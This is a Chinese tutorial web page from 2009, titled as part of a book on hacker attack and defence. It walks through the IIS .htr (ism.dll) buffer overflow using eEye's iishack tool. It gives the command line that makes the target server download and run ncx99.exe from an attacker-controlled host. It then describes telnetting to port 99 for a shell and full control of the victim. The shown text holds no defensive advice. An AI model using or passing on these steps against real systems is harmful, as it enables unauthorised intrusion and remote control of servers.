当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客攻防技术内幕-防止入侵的方法(9)

安全基础
今晨百度不能访问 教你访问的两种方法
重装系统后小白软件管家批量安装常用软件
黑客通过劫持DNS黑大型网站越来越流行
缺少msvcirt.dll解决办法
360安全中心公布:2009年中国十大木马
smss.exe进程是病毒吗?smss.exe详细讲解
病毒提示:Google退出中国,请用百度进行搜索
systeminfo命令查看系统的所有信息
网上购买飞机票:手把手教你完美抢票
保证Windows系统安全的十项具体详细设置
网上银行丢账号密码就会丢钱?
修改BIOS让软路由在通电后自动开机
设置GMAIL始终使用https进行加密
用GHOST镜像系统安装到整个硬盘的恢复方法
巧妙设置提高移动存储设备数据传输速度
解析MSN传文件比QQ传文件慢的原因
升级防火墙的7类注意事项
如何管理好自己的MySpace账号
警惕:1G硬盘做成120G大硬盘的两种方法
锁定IE默认首页禁止病毒木马篡改

安全基础 中的 黑客攻防技术内幕-防止入侵的方法(9)


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 40 ::
收藏到网摘: n/a

6.6 htr溢出入侵

    

6.6  htr溢出入侵

IISInetsrv目录下,有个DLL文件叫ism.dll,这个模块在Web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现。IIShack.asm利用这个漏洞,eEye写了两个程序:iishack.exencx99.exe

在命令提示符下运行iishack程序,如图6-60所示。

6-60  iishack运行界面

命令行运行格式:

iishack 目标主机 端口URL(ncx99链接路径)

入侵者必须自己有一个空间,把ncx99.exe上传到该空间下,比如入侵者将ncx99.exe上传的路径是:61.129.81.122/ls-net/ncx99.exe,而对方的IIS serversh.kill.com.cn,则输入如下内容:

iishack sh.kill.com.cn 80 61.129.81.122/ls-net/ncx99.exe

如图6-61所示。

注意:

在输入ncx99.exe路径时不带http://

6-61  htr溢出

接着在提示符下输入:telnet sh.kill.com.cn 99即可通过99号端口登录到对方服务器。这样,入侵者就可以完全控制目标计算机。